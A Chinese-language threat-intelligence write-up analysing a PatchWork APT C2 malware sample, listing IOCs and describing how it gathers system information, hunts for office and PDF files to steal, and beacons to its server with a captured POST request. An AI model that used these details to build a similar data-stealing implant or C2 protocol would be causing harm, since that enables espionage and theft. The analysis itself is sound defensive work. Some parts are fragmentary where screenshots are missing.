PatchWorkAPT是一个比较有意思的名字,源于该组织武器库是基于开源的代码拼凑而成(地下论坛、暗网、github等等),组织主要目标是美国军事和政治机构,曾被赛门铁克、卡巴多次对组织Attack活动披露。
组织善用于office_cve武器库,从奇安信github收录以往的样本统计中来看,office_cve通杀漏洞占据了主导地位。
以往的套路,通过漏洞进行提权和载荷的释放,利用msf进行回连,这里不做累述,有好的文章可以参考套路如下链接,本篇文章主要分析C2样本功能:
https://www.freebuf.com/articles/network/108637.html
➬ IOCs:
| Column 1 | Column 2 |
|---|---|
| 文件名 | 0f4f6913c3aa57b1fc5c807e0bc060fc |
| 大小 | 195072 bytes |
| MD5 |
➬ 样本分析:
➀ 图中url并非是组织服务端,而是用来测试通信是否有网络连接。
➁ 动态的获取函数地址,如下所示:
➂ http报文截获,如下所示:
↪ 动作一:
➃ 采集系统信息,主机名,uudi,系统版本等,如下所示:
➄ CreateThread感染分发,其中循环体中CreateThread不停分发感染线程:
➅ 405BC0线程回调会在Temp临时目录下释放文件,如下所示:
➆ 创建窗口,注册的窗口类中会包含窗口回调,用来嵌套恶意线程,线程用于初始化保存数据配置本地文件,如下所示:
↪ 动作二:
➇ 分发线程,初始化窃取数据配置文件,不同数据采集本地创建不同文件保存,如下采集系统文件名列表:
遍历全部磁盘,记录后缀xls/xlsx/pdf/docx.pptx绝对路径保存至edg499.dat文件中。
➈ 循环中分发感染线程回调函数是一样的,如下所示:
➬ C2:
➯ 初始化配置:
➚ POST报文初始化:
POST //e3e7e71a0b28b5e96cc492e636722f73//4sVKAOvu3D//ABDYot0NxyG.php HTTP/1.1..HOST: ..User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 ..Accept: application/x-www-form-urlencoded..Content-Type: application/x-www-form-urlencoded..Cache-Control: no-cache..Content-Length: 52....eI4=gLTB0mmwj6I8+jzh1sVD89McJO&zFi=iBjLOA==&crc=e3a6 ➚ Socket配置初始化
➚ 分解服务端返回的指令报文,指令功能执行: